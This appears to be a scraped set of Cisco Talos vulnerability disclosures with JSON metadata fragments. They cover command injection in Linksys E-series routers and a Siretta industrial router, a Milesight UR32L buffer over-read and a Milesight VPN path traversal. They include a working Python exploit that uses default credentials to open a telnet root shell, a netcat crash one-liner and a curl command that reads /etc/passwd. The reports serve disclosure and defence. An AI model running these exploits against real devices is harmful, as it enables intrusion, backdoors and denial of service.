RAW_MACHINE_NAME_DATA\n .text:0001FA50 nop\n .text:0001FA54\n .text:0001FA54 loc_1FA54:\n .text:0001FA54 la $a1, aAluesMayBeInco\n .text:0001FA58 la $t9, sprintf\n .text:0001FA5C addiu $s1, $sp, 0x128+var_110\n .text:0001FA60 addiu $a1, (aEchoSProcSysKe - 0x70000) # $a1 == \"echo \\\"%s\\\" > /proc/sys/kernel/hostname\"\n .text:0001FA64 move $a2, $v0 # $a2 == RAW_MACHINE_NAME_DATA\n .text:0001FA68 jalr $t9 # sprintf($s1, \"echo \\\"%s\\\" > /proc/sys/kernel/hostname\", RAW_MACHINE_NAME_DATA)\n .text:0001FA6C move $a0, $s1 # $a0 == $s1\n .text:0001FA70 lw $gp, 0x128+var_118($sp)\n .text:0001FA74 nop\n .text:0001FA78 la $t9, system\n .text:0001FA7C nop\n .text:0001FA80 jalr $t9 # system(\"echo \\\"[RAW_MACHINE_NAME_DATA]\\\" > /proc/sys/kernel/hostname\")\n .text:0001FA84 move $a0, $s1 # \"echo \\\"[RAW_MACHINE_NAME_DATA]\\\" > /proc/sys/kernel/hostname\"\n \n\nCVE-2018-3955 - wan_domain - set_host_domain_name\n\nData entered into the \u2018Domain Name\u2019 input field through the web portal is submitted to apply.cgi as the value to the \u2018wan_domain\u2019 POST parameter. The wan_domain data goes through the nvram_set process described above. 
When the \u2018preinit\u2019 binary receives the SIGHUP signal it enters a code path that calls a function named \u2018set_host_domain_name\u2019 from its libshared.so shared object.\n \n \n ### binary: preinit\n .text:0041F040 loc_41F040:\n .text:0041F040 la $a0, aORemoteServer\n .text:0041F044 la $t9, nvram_set\n .text:0041F048 addiu $a0, (aWanRunMtu - 0x480000)\n .text:0041F04C move $a1, $v0\n .text:0041F050 jalr $t9\n .text:0041F054 move $s3, $t9\n .text:0041F058 lw $gp, 0xD0+var_B0($sp)\n .text:0041F05C nop\n .text:0041F060 la $t9, set_host_domain_name # function containing vuln\n .text:0041F064 nop\n .text:0041F068 jalr $t9 # goto: set_host_domain_name\n .text:0041F06C nop\n \n\nThe \u2018set_host_domain_name\u2019 function in libshared.so continues until offset 0x0001FBCC where nvram_get is called against the \u2018wan_domain\u2019 parameter. The result of that operation is subsequently combined with a string via a snprintf call and passed directly into system.\n \n \n ## shared object: libshared.so\n .text:0001FB7C loc_1FB7C:\n .text:0001FB7C\n .text:0001FB7C la $a2, aAluesMayBeInco\n .text:0001FB80 la $t9, snprintf\n .text:0001FB84 move $a0, $s1 # $a0 == $s1 == ptr to final cmd buffer\n .text:0001FB88 addiu $a2, (aEchoSProcSysKe_0 - 0x70000) # $a2 == \"echo \\\"%s\\\" > /proc/sys/kernel/domainname\"\n .text:0001FB8C move $a3, $v0 # $a3 == RAW_MACHINE_NAME_DATA\n .text:0001FB90 jalr $t9 ; snprintf # snprintf($s1, 0xFE, \"echo \\\"%s\\\" > /proc/sys/kernel/domainname\", RAW_MACHINE_NAME_DATA)\n .text:0001FB94 li $a1, 0xFE # $a1 == snprintf max size\n .text:0001FB98 lw $gp, 0x128+var_118($sp)\n .text:0001FB9C nop\n .text:0001FBA0 la $t9, system\n .text:0001FBA4 nop\n .text:0001FBA8 jalr $t9 ; system # system(\"echo \\\"[RAW_MACHINE_NAME_DATA]\\\" > /proc/sys/kernel/domainname\")\n .text:0001FBAC move $a0, $s1 \n .text:0001FBB0 lw $gp, 0x128+var_118($sp)\n .text:0001FBB4 lw $ra, 0x128+var_4($sp)\n .text:0001FBB8 lw $s2, 0x128+var_8($sp)\n .text:0001FBBC lw 
$s1, 0x128+var_C($sp)\n .text:0001FBC0 lw $s0, 0x128+var_10($sp)\n .text:0001FBC4 jr $ra\n .text:0001FBC8 addiu $sp, 0x128\n .text:0001FBCC loc_1FBCC: \n .text:0001FBCC\n .text:0001FBCC la $t9, nvram_get\n .text:0001FBD0 move $t9, $s0\n .text:0001FBD4 jalr $t9 # nvram_get(\"wan_domain\")\n .text:0001FBD8 addiu $a0, $s2, (aWanDomain - 0x70000) # $a0 == \"wan_domain\"\n .text:0001FBDC lw $gp, 0x128+var_118($sp)\n .text:0001FBE0 bnez $v0, loc_1FB7C # $v0 == RAW_MACHINE_NAME_DATA\n .text:0001FBE4 nop\n .text:0001FBE8 b loc_1FB20\n .text:0001FBEC nop\n \n\n### Crash Information\n\nN/A\n\n### Exploit Proof of Concept\n\nUsage: python poc.py [vulnerable_param] [target_ip] [port_to_open]\n\nVulnerable parameters:\n\n- wan_domain\n- machine_name\n\nExample: python poc.py wan_domain 192.168.1.1 1337\n\nNOTE: This proof of concept will work for both the E1200 and the E2500.\n \n \n # Differences in authentication are handled by a request to /HNAP1:\n \n import requests\n import hashlib\n import sys\n import re\n from time import sleep\n \n def printError(additionalComment):\n if additionalComment != \"\":\n print \"[!] 
ERROR: %s\" % additionalComment\n print \"Usage: python poc.py [vulnerable_param] [target_ip] [port_to_open]\"\n print \"\"\n print \"Vulnerable Parameters\"\n print \" - wan_domain\"\n print \" - machine_name\"\n exit(0)\n \n def hashPassword(password):\n password_size = len(password)\n if password_size < 10:\n password_size = \"0%s\" % (password_size)\n base_key = \"%s%s\" % (password, password_size)\n base_key_size = len(base_key)\n max_password_size = 64\n key = \"\"\n for i in xrange(max_password_size):\n key = \"%s%s\" % (key, base_key[i%base_key_size])\n \n hashed_password = hashlib.md5(key).hexdigest()\n return hashed_password\n \n def sendCmd(param, base_uri, session, cmd):\n # format command appropriately\n cmd = \"`%s `\" % (cmd)\n \n # set up header details\n uri = \"%s/apply.cgi%s\" % (base_uri, session)\n referer = \"%s/index.asp?%s\" % (base_uri, session)\n headers = {\"Referer\":referer}\n \n # set the desired parameter\n machine_name_cmd = \"\"\n wan_domain_cmd = \"\"\n if param == \"machine_name\":\n machine_name_cmd = cmd\n elif param == \"wan_domain\":\n wan_domain_cmd = cmd\n else:\n printError(\"An invalid parameter was entered\")\n \n # set up POST data\n data = \"submit_button=index&change_action=&submit_type=&gui_action=Apply\"\n data += \"&now_proto=dhcp&daylight_time=1&switch_mode=0&hnap_devicename=\"\n data += \"&need_reboot=0&user_language=&wait_time=0&dhcp_start=100\"\n data += \"&dhcp_start_conflict=0&lan_ipaddr=4&ppp_demand_pppoe=9\"\n data += \"&ppp_demand_pptp=9&ppp_demand_l2tp=9&ppp_demand_hb=9\"\n data += \"&wan_ipv6_proto=dhcp&detect_lang=en&wan_proto=dhcp&wan_hostname=\"\n data += \"&wan_domain=%s&mtu_enable=0&lan_ipaddr_0=192&lan_ipaddr_1=168\" % (wan_domain_cmd)\n data += \"&lan_ipaddr_2=1&lan_ipaddr_3=1&lan_netmask=255.255.255.0\"\n data += \"&machine_name=%s&lan_proto=dhcp&dhcp_check=&dhcp_start_tmp=100\" % (machine_name_cmd)\n data += \"&dhcp_num=50&dhcp_lease=0&wan_dns=4&wan_dns0_0=0&wan_dns0_1=0\"\n data += 
\"&wan_dns0_2=0&wan_dns0_3=0&wan_dns1_0=0&wan_dns1_1=0&wan_dns1_2=0\"\n data += \"&wan_dns1_3=0&wan_dns2_0=0&wan_dns2_1=0&wan_dns2_2=0&wan_dns2_3=0\"\n data += \"&wan_wins=4&wan_wins_0=0&wan_wins_1=0&wan_wins_2=0&wan_wins_3=0\"\n data += \"&time_zone=-08+1+1&_daylight_time=1\"\n \n # make request\n res = requests.post(uri, headers=headers, data=data)\n sleep(30)\n \n def main():\n # check input\n if len(sys.argv) != 4:\n printError(\"\")\n \n param = sys.argv[1]\n rhost = sys.argv[2]\n rport = sys.argv[3]\n \n if param != \"wan_domain\" and param != \"machine_name\":\n printError(\"An invalid parameter was entered\")\n \n user = \"admin\"\n raw_password = \"admin\"\n http_port = 80\n \n base_uri = \"http://%s:%s\" % (rhost, http_port)\n \n try:\n # get the device version to see if we have to hash the password before transmission\n # only has to happen for the E1200 at this time\n password = \"\"\n uri = \"%s/HNAP1\" % (base_uri)\n res = requests.get(uri)\n device = re.search(\"<ModelDescription>.*?</ModelDescription>\", res.text).group(0)\n device = device.split(\"<ModelDescription>\")[1]\n device = device.split(\"</ModelDescription>\")[0]\n if device == \"E1200\":\n # hash the password for transit\n password = hashPassword(raw_password)\n else:\n password = raw_password\n \n # get the session token\n print \"[*] Getting a session token using credentials %s:%s\" % (user, raw_password)\n uri = \"%s/login.cgi\" % (base_uri)\n data = \"submit_button=login&change_action=&action=Apply&wait_time=19\"\n data += \"&submit_type=&http_username=%s&http_passwd=%s\" % (user, password)\n res = requests.post(uri, data=data)\n \n # extract the session id with the required initial character (? 
for FRNv4 and ; for FRNv0)\n session = re.search('.session_id=[\\d\\w]{32}', res.text).group(0)\n print \"[*] Got session: %s\" % (session[12:])\n \n # start telnet backdoor\n print \"[*] Opening Backdoor\"\n cmd = \"telnetd -l/bin/sh -p%s\" % (rport)\n sendCmd(param, base_uri, session, cmd)\n \n print \"[*] done\"\n \n except Exception as e:\n printError(e)\n \n if __name__ == '__main__':\n main()\n \n\n### Timeline\n\n2018-07-09 - Vendor Disclosure \n2018-08-14 - Vendor released patch for e1200 \n2018-10-04 - Vendor released patch for e2500 \n2018-10-10 - Public disclosure\n", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 7.2, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-10-16T00:00:00", "type": "talos", "title": "Linksys ESeries multiple OS command injection vulnerabilities", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-3953", "CVE-2018-3954", "CVE-2018-3955"], "modified": "2018-10-16T00:00:00", "id": "TALOS-2018-0625", "href": "https://www.talosintelligence.com/vulnerability_reports/TALOS-2018-0625", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2023-12-02T18:55:49", "description": "# Talos 
Vulnerability Report\n\n### TALOS-2022-1640\n\n## Siretta QUARTZ-GOLD m2m m2m_parse_router_config cmd OS command injection vulnerabilities\n\n##### January 26, 2023\n\n##### CVE Number\n\nCVE-2022-42492,CVE-2022-42491,CVE-2022-42493,CVE-2022-42490\n\n##### SUMMARY\n\nSeveral OS command injection vulnerabilities exist in the m2m binary of Siretta QUARTZ-GOLD G5.0.1.5-210720-141020. A specially-crafted network request can lead to arbitrary command execution. An attacker can send a network request to trigger these vulnerabilities.\n\n##### CONFIRMED VULNERABLE VERSIONS\n\nThe versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.\n\nSiretta QUARTZ-GOLD G5.0.1.5-210720-141020\n\n##### PRODUCT URLS\n\nQUARTZ-GOLD - <https://www.siretta.com/products/industrial-routers/4g-lte-router/gigabit-ethernet-small-footprint-lte-router-eu/>\n\n##### CVSSv3 SCORE\n\n9.8 - CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n\n##### CWE\n\nCWE-78 - Improper Neutralization of Special Elements used in an OS Command (\u2018OS Command Injection\u2019)\n\n##### DETAILS\n\nThe Siretta QUARTZ-GOLD is an industrial router with several functionalities and services, such as: SSH, UPNP, VPN, SNMP and many others.\n\nThe QUARTZ-GOLD offers a feature called `M2M`. When enabled, the device will execute the `m2m` binary and offer different network services. One of the services the `m2m` binary offers handles several commands. 
To communicate with this service the client must send a specific UDP packet format.\n\nSeveral commands use the `m2m_parse_router_config` function:\n \n \n uint m2m_parse_router_config(char *data,uint data_len)\n \n {\n [...]\n \n memset(nvram_command,0,0x800);\n memset(param,0,0x400);\n syslog(5,\"----parse_router_config %d:%s----\",data_len,data);\n syslog(5,\"----NVRAM Set Command Start----\");\n len_first_non_amp = strspn(data,\"&\"); // skip leading '&' characters\n strncpy(param,data + len_first_non_amp,0x400);\n first_amp = strcspn(param,\"&\" ); // end of the first key=value pair\n param[first_amp] = '\\0';\n local_19 = 0;\n pcVar1 = strchr(data + len_first_non_amp,L'&');\n while (param[0] != '\\0') {\n memset(nvram_command,0,0x800);\n sprintf(nvram_command,\"nvram set %s\",param); // [1]\n syslog(5,\"%s\",nvram_command);\n system(nvram_command); // [2]\n [...]\n \n\nThis function will parse the data in the received UDP packet. The command expects a list of the form `<nvram_key_1>=<nvram_value_1>&<nvram_key_2>=<nvram_value_2>....`. Then, for each key-value pair, it composes at `[1]` the string `nvram set <nvram_key>=<nvram_value>`. The composed string is used as the argument of the `system` function at `[2]`. The problem is that, from the reception of the command packet up to `[2]`, the data is never sanitized. This allows any string to be used as the argument of the `system` call, which can lead to an OS command injection.\n\nFollowing is the list of the vulnerable commands that will call the `m2m_parse_router_config` function.\n\n#### CVE-2022-42490 - DOWNLOAD_CFG_FILE command injection\n\nFollowing is the portion of the `m2m` binary that manages the `DOWNLOAD_CFG_FILE` command:\n \n \n syslog(5,\"M2M Command(%02x) DOWNLOAD_CFG_FILE!!!\",0x16);\n [...]\n data_len = __bswap_16(UDP_data_buff.data_len);\n syslog(5,\"DOWNLOAD_CFG_FILE %d:%s\",\n data_len,\n &UDP_data_buff.data);\n temp = m2m_parse_router_config(&UDP_data_buff.data, data_len);\n [...] 
The command calls the `m2m_parse_router_config` function with the provided `UDP_data_buff.data`, an array of characters, and `UDP_data_buff.data_len`, its length. This leads to a command injection vulnerability.

#### CVE-2022-42491 - M2M_CONFIG_SET command injection

Following is the portion of the `m2m` binary that manages the `M2M_CONFIG_SET` command:

    syslog(5, "M2M Command(%02x) M2M_CONFIG_SET!!!", 6);
    [...]
    data_len = __bswap_16(UDP_data_buff.data_len);
    syslog(5, "M2M_CONIFG_SET %d:%s",
           data_len,
           &UDP_data_buff.data);
    global_UDP_packet = m2m_parse_router_config(&UDP_data_buff.data, data_len);
    [...]

The command calls the `m2m_parse_router_config` function with the provided `UDP_data_buff.data`, an array of characters, and `UDP_data_buff.data_len`, its length. This leads to a command injection vulnerability.

#### CVE-2022-42492 - DOWNLOAD_AD command injection

Following is the portion of the `m2m` binary that manages the `DOWNLOAD_AD` command:

    syslog(5, "M2M Command(%02x) DOWNLOAD_AD!!!", 0xe);
    [...]
    data_len = __bswap_16(UDP_data_buff.data_len);
    syslog(5, "M2M_CONIFG_SET %d:%s",
           data_len,
           &UDP_data_buff.data);
    if (DOWNLOAD_THREAD_STARTED == 0) {
        global_UDP_packet = m2m_parse_router_config(&UDP_data_buff.data, data_len);
        [...]

The command calls the `m2m_parse_router_config` function with the provided `UDP_data_buff.data`, an array of characters, and `UDP_data_buff.data_len`, its length.
This leads to a command injection vulnerability.

#### CVE-2022-42493 - DOWNLOAD_INFO command injection

Following is the portion of the `m2m` binary that manages the `DOWNLOAD_INFO` command:

    syslog(5, "M2M Command(%02x) DOWNLOAD_INFO!!!", 0xc);
    [...]
    data_len = __bswap_16(UDP_data_buff.data_len);
    syslog(5, "M2M_CONIFG_SET %d:%s",
           data_len,
           &UDP_data_buff.data);
    nvram_unset("type");
    temp = m2m_parse_router_config(&UDP_data_buff.data, data_len);
    [...]

The command calls the `m2m_parse_router_config` function with the provided `UDP_data_buff.data`, an array of characters, and `UDP_data_buff.data_len`, its length. This leads to a command injection vulnerability.

##### TIMELINE

2022-10-14 - Initial Vendor Contact

2022-10-20 - Vendor Disclosure

2022-11-24 - Vendor Patch Release

2023-01-26 - Public Release

##### Credit

Discovered by Francesco Benvenuto of Cisco Talos.

* * *
# Talos Vulnerability Report

### TALOS-2023-1696

## Milesight UR32L eventcore access violation vulnerability

##### July 6, 2023

##### CVE Number

CVE-2023-23571

##### SUMMARY

An access violation vulnerability exists in the eventcore functionality of Milesight UR32L v32.3.0.5. A specially crafted network request can lead to denial of service. An attacker can send a network request to trigger this vulnerability.

##### CONFIRMED VULNERABLE VERSIONS

The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.

Milesight UR32L v32.3.0.5

##### PRODUCT URLS

UR32L - <https://www.milesight-iot.com/cellular/router/ur32l/>

##### CVSSv3 SCORE

7.5 - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

##### CWE

CWE-126 - Buffer Over-read

##### DETAILS

The Milesight UR32L is an industrial cellular router. Its features include support for multiple VPNs, a router console shell, a firewall and many others.

The router can be set up to trigger an action after a particular event occurs; for instance, it can send an e-mail or an SMS after a device reboot. Other actions and events exist. The binary that actually performs the action once an event occurs is `eventcore`.

The `eventcore` binary has a thread that waits for data that appears to be used to query the SQLite3 database in which the various event-related information is archived.
Following is the `recv_data_thread` function that manages the reception of the data:

    undefined4 recv_data_thread(int *socket)
    {
        [... variable declaration ...]

        [... variable initialization ...]
        memset(chunk_buff + 4, 0, 0x1fc);
        [... variable initialization ...]

        if (socket == (int *)0x0) {
            syslog(3, "param is null\n");
        }
        else {
            socket_ = *socket;
            if (socket_ < 1) {
                syslog(3, "udp fd less than 0.\n");
            }
            else {
                message = (char *)malloc_and_memset(0x800);
                if (message != (char *)0x0) {
                    memset(message, 0, 0x800);
                    do {
                        while( true ) {
                            memset(chunk_buff, 0, 0x200);
                            message_strlen = strlen(message);
                            recv_length = recv_wrap(socket_, chunk_buff, 0x1ff, &src_addr);         [1]
                            if ((chunk_buff[0] == '\0') || (recv_length != 0x1ff)) break;
                            memcpy(message + message_strlen, chunk_buff, 0x800 - message_strlen);   [2]
                        }
                        [...]
                    }
                }
                [...]
            }

The function runs a loop in which it receives at most 0x1ff bytes into the `chunk_buff` buffer and then appends the content of `chunk_buff` to the `message` buffer.

The `chunk_buff` buffer is correctly sized, with 512 bytes available, so the read at `[1]` is fine. At `[2]`, however, `memcpy` copies `0x800 - message_strlen` bytes from `chunk_buff` into `message`, so the first `memcpy` copies 0x800 bytes out of a buffer that holds at most 0x1ff received bytes. This is a buffer over-read. Furthermore, the thread starts with a fresh stack, which means the stack buffer `chunk_buff` lies close to the end of the stack mapping, and the over-read therefore causes a SIGSEGV.

Debugging the process makes the problem easy to see:

    memcpy@plt (
       $r0 = 0x00043730 → 0x00000000,
       $r1 = 0x76de4b0c → "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA[...]",
       $r2 = 0x00000800,
    )

The `$r1` register holds the source address of the copy, that is, the `chunk_buff` buffer; in this case it is `0x76de4b0c`.
Following are the thread's stack region and the region adjacent to it:

    0x76bf0000 0x76de5000 0x00000000 rw-
    0x76de5000 0x76de6000 0x00000000 ---

The distance between `chunk_buff`, at `0x76de4b0c`, and the end of the thread's stack region, at `0x76de5000`, is 0x4f4 bytes. So reading 0x800 bytes from `chunk_buff` means the copy will try to access memory outside the stack region.

### Crash Information

    Thread 5 "eventcore" received signal SIGSEGV, Segmentation fault.
    0x76f3d540 in memcpy () from target:/lib/ld-musl-armhf.so.1
    [ Legend: Modified register | Code | Heap | Stack | String ]
    ──── registers ────
    $r0  : 0x76ef2a20 → 0x00000000
    $r1  : 0x76d67ffc → 0x00000000
    $r2  : 0x2f0
    $r3  : 0x10
    $r4  : 0x0
    $r5  : 0x0
    $r6  : 0x0
    $r7  : 0x0
    $r8  : 0x0
    $r9  : 0x0
    $r10 : 0x0
    $r11 : 0x0
    $r12 : 0x0
    $sp  : 0x76d67ac8 → 0x76f417ac → ldr r3, [r0, #140] ; 0x8c
    $lr  : 0x00012e7c → 0xea000034 ("4"?)
    $pc  : 0x76f3d540 → <memcpy+140> ldm r1!, {r4, r5, r6, r7, r8, r9, r10, r11}
    $cpsr: [negative zero CARRY overflow interrupt fast thumb]
    ──── stack ────
    0x76d67ac8│+0x0000: 0x76f417ac → ldr r3, [r0, #140] ; 0x8c ← $sp
    0x76d67acc│+0x0004: 0x76d67d44 → 0x76d67d44 → [loop detected]
    0x76d67ad0│+0x0008: 0x00000078 ("x"?)
    0x76d67ad4│+0x000c: 0x7eac7d34 → 0x00000000
    0x76d67ad8│+0x0010: 0x76f68540 → 0x00000000
    0x76d67adc│+0x0014: 0x76d67d44 → 0x76d67d44 → [loop detected]
    0x76d67ae0│+0x0018: 0x76d67d24 → 0x76f41830 → bl 0x76f41628 <pthread_exit>
    0x76d67ae4│+0x001c: 0x76ef2530 → "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA[...]"
    ──── code:arm:ARM ────
       0x76f3d534 <memcpy+128> sub r2, r2, r3
       0x76f3d538 <memcpy+132> subs r2, r2, #32
       0x76f3d53c <memcpy+136> bcc 0x76f3d554 <memcpy+160>
     → 0x76f3d540 <memcpy+140> ldm r1!, {r4, r5, r6, r7, r8, r9, r10, r11}
       0x76f3d544 <memcpy+144> subs r2, r2, #32
       0x76f3d548 <memcpy+148> stmia r0!, {r4, r5, r6, r7, r8, r9, r10, r11}
       0x76f3d54c <memcpy+152> bcs 0x76f3d540 <memcpy+140>
       0x76f3d550 <memcpy+156> add r2, r2, #32
       0x76f3d554 <memcpy+160> tst r2, #31
    ──── threads ────
    [#0] Id 1, Name: "eventcore", stopped 0x76f40174 in __clone (), reason: SIGSEGV
    [#1] Id 2, Name: "eventcore", stopped 0x76f40174 in __clone (), reason: SIGSEGV
    [#2] Id 3, Name: "eventcore", stopped 0x76f40174 in __clone (), reason: SIGSEGV
    [#3] Id 4, Name: "eventcore", stopped 0x76f40174 in __clone (), reason: SIGSEGV
    [#4] Id 5, Name: "eventcore", stopped 0x76f3d540 in memcpy (), reason: SIGSEGV
    ──── trace ────
    [#0] 0x76f3d540 → memcpy()
    [#1] 0x12e7c → b 0x12f54

### Exploit Proof of Concept

Executing the following bash command will result in the crash of the `eventcore` binary:

    echo `python -c "print('A'*0x1ff)"` | nc -u <ROUTER_IP> 9001

##### VENDOR RESPONSE

Since the maintainer of this software did not release a patch during the 90-day window specified in our policy, we have now decided to release the information regarding this vulnerability, to make users of the software aware of this problem. See Cisco's Coordinated Vulnerability Disclosure Policy for more information: https://tools.cisco.com/security/center/resources/vendor_vulnerability_policy.html
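As an added example (not eventcore's or Milesight's code), the following C shows the reassembly loop with the copy length bounded by both the bytes actually received and the space left in `message`; fed the proof-of-concept input of 0x1ff `A` bytes it stores 0x1ff bytes instead of reading 0x800 out of the 0x200-byte stack buffer. The `append_chunk` and `reassemble` names, and the in-memory stream standing in for `recv_wrap`, are assumptions of the example.

```c
#include <stddef.h>
#include <string.h>

#define CHUNK_MAX   0x1ff   /* bytes recv_wrap reads per call in eventcore */
#define MESSAGE_MAX 0x800   /* size of the malloc'd message buffer */

/* Append a received chunk to `message`, a NUL-terminated string with
 * MESSAGE_MAX bytes of storage. Returns the new length, or -1 if the chunk
 * does not fit. The copy length is bounded by the bytes actually received
 * AND the space left in the destination; the vulnerable code used only the
 * latter, so its first memcpy pulled 0x800 bytes out of a 0x200-byte stack
 * buffer. */
long append_chunk(char *message, const char *chunk, size_t recv_len)
{
    size_t have = strlen(message);
    size_t room = MESSAGE_MAX - 1 - have;           /* keep the terminator */
    if (recv_len > CHUNK_MAX || recv_len > room)
        return -1;
    memcpy(message + have, chunk, recv_len);
    message[have + recv_len] = '\0';
    return (long)(have + recv_len);
}

/* Drive the same loop eventcore runs, with the datagram stream supplied in
 * memory instead of from a socket (an assumption of this example): take up
 * to CHUNK_MAX bytes at a time, append, and stop on a short read or on a
 * leading NUL, the two conditions eventcore tests. Returns the assembled
 * length or -1 on overflow. */
long reassemble(const unsigned char *stream, size_t stream_len, char *message)
{
    size_t off = 0;
    message[0] = '\0';
    for (;;) {
        char chunk[CHUNK_MAX + 1];
        size_t take = stream_len - off;
        if (take > CHUNK_MAX)
            take = CHUNK_MAX;
        memset(chunk, 0, sizeof chunk);
        memcpy(chunk, stream + off, take);
        off += take;
        if (take == 0 || chunk[0] == '\0')
            break;
        if (append_chunk(message, chunk, take) < 0)
            return -1;
        if (take != CHUNK_MAX)
            break;
    }
    return (long)strlen(message);
}

/* Constructed input in the shape of the proof of concept: n bytes of 'A'
 * (the PoC sends exactly 0x1ff). Returns what reassemble() reports. */
long reassemble_constructed(size_t n)
{
    unsigned char stream[4 * MESSAGE_MAX];
    char message[MESSAGE_MAX];
    if (n > sizeof stream)
        return -1;
    memset(stream, 'A', n);
    return reassemble(stream, n, message);
}
```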
##### TIMELINE

2023-02-14 - Initial Vendor Contact

2023-02-21 - Vendor Disclosure

2023-07-06 - Public Release

##### Credit

Discovered by Francesco Benvenuto of Cisco Talos.

* * *

# Talos Vulnerability Report

### TALOS-2023-1702

## Milesight MilesightVPN server.js start directory traversal vulnerability

##### July 6, 2023

##### CVE Number

CVE-2023-23907

##### SUMMARY

A directory traversal vulnerability exists in the server.js start functionality of Milesight VPN v2.0.2. A specially-crafted network request can lead to arbitrary file read. An attacker can send a network request to trigger this vulnerability.

##### CONFIRMED VULNERABLE VERSIONS

The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.

Milesight VPN v2.0.2

##### PRODUCT URLS

MilesightVPN - <https://www.milesight-iot.com/milesightvpn/>

##### CVSSv3 SCORE

7.5 - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

##### CWE

CWE-22 - Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')

##### DETAILS

MilesightVPN is software that simplifies setting up the VPN tunnel for Milesight products and also allows the connection status to be monitored through a web interface.

The `start` function in MilesightVPN's `server.js` file is the one responsible for handling the received requests:

    function start(route,handle,connection,generateToken,verifyToken,lang){
        const options={
            key:fs.readFileSync(path.join(__dirname,'./https/server.key')),
            cert:fs.readFileSync(path.join(__dirname,'./https/server.crt'))
        };
        var defaultpage={
            page:'index.html',
            login:'login.html',
            port:'18080',
            ssl_port:'18443'
        };
        disconnect(connection);
        [...]
        https.createServer(options,function(req,res){
            var method=req.method;
            var pathname=url.parse(req.url).pathname;
            [...]
            var ext=path.parse(pathname).ext;
            ext=ext.slice(1);
            [...]
            var realPath=path.join(__dirname,'../'+pathname);
            var cookie=req.headers.cookie;
            if(cookie)
            {
                [...]
            }
            else
            {
                if(ext=='html'&&(pathname.indexOf('login.html')<0&&pathname.indexOf('Device_Auth')<0))
                {
                    [...]
                }
            }

            if(method=='POST')
            {
                [...]
            }
            else
            {
                [...]
                if(ext=='html')
                {
                    [...]
                }
                fs.readFile(realPath,function(err,data){   [1]
                    [...]
                    var contentType='';
                    switch(ext){
                        case 'html':
                            contentType='text/html';
                            break;
                        [...]
                        default:
                            contentType='text/plain';
                    }
                    res.writeHead(200,{'Content-Type':contentType});
                    res.end(data);
                });
            }
        }).listen(defaultpage.ssl_port);
    }

The function performs a series of checks when the requested page's extension is `html` and when a cookie is provided. But if the file does not have that extension and no cookie is provided, the code eventually reaches `[1]`, and because no check is performed on the provided path, the function is vulnerable to an unauthenticated directory traversal.

### Exploit Proof of Concept

Following is a POC for the vulnerability described above:

    $ curl --path-as-is --insecure https://<SERVER_ADDRESS>/../etc/passwd

    root:x:0:0:root:/root:/bin/bash
    daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
    bin:x:2:2:bin:/bin:/usr/sbin/nologin
    sys:x:3:3:sys:/dev:/usr/sbin/nologin
    sync:x:4:65534:sync:/bin:/bin/sync
    games:x:5:60:games:/usr/games:/usr/sbin/nologin
    man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
    lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
    mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
    news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
    uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
    proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
    www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
    backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
    list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
    irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
    gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
    nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
    systemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
    systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
    systemd-timesync:x:102:104:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
    messagebus:x:103:106::/nonexistent:/usr/sbin/nologin
    syslog:x:104:110::/home/syslog:/usr/sbin/nologin
    _apt:x:105:65534::/nonexistent:/usr/sbin/nologin
    tss:x:106:111:TPM software stack,,,:/var/lib/tpm:/bin/false
    uuidd:x:107:112::/run/uuidd:/usr/sbin/nologin
    tcpdump:x:108:113::/nonexistent:/usr/sbin/nologin
    sshd:x:109:65534::/run/sshd:/usr/sbin/nologin
    landscape:x:110:115::/var/lib/landscape:/usr/sbin/nologin
    pollinate:x:111:1::/var/cache/pollinate:/bin/false
    vagrant:x:1000:1000:,,,:/home/vagrant:/bin/bash
    systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
    ubuntu:x:1001:1001:Ubuntu:/home/ubuntu:/bin/bash
